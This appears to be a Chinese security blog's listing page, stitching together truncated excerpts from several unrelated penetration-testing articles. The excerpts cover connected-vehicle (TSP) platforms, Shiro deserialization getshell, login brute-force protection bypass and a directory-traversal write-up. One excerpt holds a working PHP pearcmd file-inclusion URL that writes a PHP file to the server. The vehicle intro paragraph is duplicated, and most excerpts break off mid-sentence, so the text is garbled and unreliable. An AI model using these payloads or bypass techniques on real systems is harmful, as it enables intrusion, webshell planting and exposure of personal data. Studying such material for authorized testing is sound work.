TSP平台渗透测试初探
1.车联网网络架构简介车联网的网络架构通常包括四层,分别是感知层、传输层、平台层和应用层。感知层是车联网的最底层,也是最靠近车辆的一层。它包括车辆上的各种传感器和执行器,例如GPS定位器、车载通信模块、摄像头、雷达、惯性传感器、轮速传感器等等,这些设备可以收集车辆的状态信息、位置信息等数据。 传输层是车联网的数据传输层,负责将感知层收集到的数据传输到平台层进行处理。传输层一般使用无线网络进行通信,
1.车联网网络架构简介车联网的网络架构通常包括四层,分别是感知层、传输层、平台层和应用层。感知层是车联网的最底层,也是最靠近车辆的一层。它包括车辆上的各种传感器和执行器,例如GPS定位器、车载通信模块、摄像头、雷达、惯性传感器、轮速传感器等等,这些设备可以收集车辆的状态信息、位置信息等数据。 传输层是车联网的数据传输层,负责将感知层收集到的数据传输到平台层进行处理。传输层一般使用无线网络进行通信,
Exp# 写文件 http://172.17.0.2/public/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?=phpinfo()?>+/tmp/hello.php # 包含文件 http://172.17.0.2/public/index.p
外网打点访问目标网站发现是统一登录认证,子域名枚举发现存在oa、erp、mail等。其中一个存在Shiro反序列化漏洞,直接上工具:检测发现存在Shiro反序列化漏洞key,但是未找到利用链。奇怪,换个工具再试,成功Getshell,如图:root到手了,还得是飞鸿啊,吃个肉夹馍压压惊。你以为这就结束了?其实这才是刚刚开始,由于该服务器不出网,无法反弹shell,为了方便管理还是使用Webshel
对于没有验证码,没有带token,没有使用AES、RSA等加密算法加密,没有错误账号锁定机制,没有IP锁定机制,或者仅使用一些简单的防护,如对密码进行MD5、SHA-1等,多次错误锁定账号或IP等的Web登录表单来说,绕过这些策略去暴力破解太容易了。本文结合实战经验总结了其它三种绕过防护暴力破解的方法:验证码识别、带token的登录请求、前端加密。验证码识别对于简单图片验证码,可以使用PKAV进行
信息收集访问网站发现前台为静态页面,且不存在robots.txt文件。然后扫描网站目录发现网站后台路径adminxxx/login.jsp,且网站存在目录遍历漏洞,通过该漏洞可查看到一些身份证、姓名、住址和电话号码等敏感信息,如图:漏洞发现及利用访问网站后台登录界面,如图:验证码明文返回使用sqlmap测试未发现SQL注入漏洞,通过抓包发现验证码直接返回到HTTP Response中,如图:弱口令